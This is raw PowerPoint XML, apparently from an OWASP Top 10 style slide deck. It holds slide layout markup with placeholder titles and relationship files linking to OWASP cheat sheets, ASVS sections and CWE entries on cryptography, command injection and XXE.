          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>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lIns="54000" tIns="54000" rIns="54000"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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr userDrawn="1">
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1934264512"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957457"/>
          <a:ext cx="6836400" cy="2102203"/>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203">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Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>?</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endParaRPr lang="en-US" sz="1000" b="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6" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10800" y="6372000"/>
            <a:ext cx="3383280" cy="2761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7" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10800" y="3132000"/>
            <a:ext cx="3383280" cy="3168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600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463200" y="3132000"/>
            <a:ext cx="3383280" cy="3168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3" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534000" y="108000"/>
            <a:ext cx="252000" cy="2286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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Gruppieren 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="24248" y="1044000"/>
            <a:ext cx="6071752" cy="388200"/>
            <a:chOff x="24248" y="1044000"/>
            <a:chExt cx="6071752" cy="388200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="24248" y="1044000"/>
              <a:ext cx="6071752" cy="388200"/>
              <a:chOff x="24248" y="1056343"/>
              <a:chExt cx="6071752" cy="388200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1056343"/>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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105375"/>
                <a:ext cx="139700" cy="305289"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28"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29"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0"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1"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2"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25" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="24248" y="1079143"/>
                <a:ext cx="484949" cy="297517"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="36000" rIns="36000">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>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20" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1143000" y="1076806"/>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Attack</a:t>
                </a:r>
              </a:p>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Vectors</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879477" y="1063543"/>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Security</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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="23" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2005013" y="1253973"/>
                <a:ext cx="838922"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22" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683695" y="1253973"/>
                <a:ext cx="4536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16" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1051200"/>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17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2883600" y="1195200"/>
              <a:ext cx="92320"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5" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3899845" y="1241999"/>
              <a:ext cx="15624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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="680913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9" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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1" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>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tIns="54000"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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr userDrawn="1">
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418706939"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957457"/>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Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>?</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endParaRPr lang="en-US" sz="1000" b="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6" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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7" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3168000"/>
            <a:ext cx="3383280" cy="315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600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3168000"/>
            <a:ext cx="3383280" cy="315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3" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534000" y="108000"/>
            <a:ext cx="252000" cy="2286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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Gruppieren 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="24248" y="1058047"/>
            <a:ext cx="6071752" cy="390006"/>
            <a:chOff x="24248" y="1058047"/>
            <a:chExt cx="6071752" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="24248" y="1058047"/>
              <a:ext cx="6071752" cy="386519"/>
              <a:chOff x="24248" y="1070390"/>
              <a:chExt cx="6071752" cy="386519"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1070390"/>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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105375"/>
                <a:ext cx="139700" cy="305289"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28"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29"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0"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1"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2"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25" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="24248" y="1079143"/>
                <a:ext cx="484949" cy="297517"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="36000" rIns="36000">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>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20" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1143000"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Attack</a:t>
                </a:r>
              </a:p>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Vectors</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18"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Security</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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="23" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="20" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1981200" y="1257554"/>
                <a:ext cx="838200" cy="4864"/>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22" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="20" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="685800" y="1256471"/>
                <a:ext cx="457200" cy="1083"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 52974"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
                <a:miter lim="800000"/>
                <a:headEnd type="oval" w="sm" len="sm"/>
                <a:tailEnd type="oval" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1067053"/>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17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1211643"/>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5" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="18" idx="3"/>
              <a:endCxn id="21" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3899845" y="1251307"/>
              <a:ext cx="1586555" cy="727"/>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5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2194897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5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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3200" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter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9" r:id="rId1"/>
    <p:sldLayoutId id="2147483660" r:id="rId2"/>
    <p:sldLayoutId id="2147483663" r:id="rId3"/>
    <p:sldLayoutId id="2147483674" r:id="rId4"/>
    <p:sldLayoutId id="2147483672" r:id="rId5"/>
    <p:sldLayoutId id="2147483662" r:id="rId6"/>
    <p:sldLayoutId id="2147483649" r:id="rId7"/>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3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V10_Communications" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V9_Data_Protection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V7_Cryptography" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html"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www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/xml/xml_dtd_intro.asp" TargetMode="External"/><Relationship 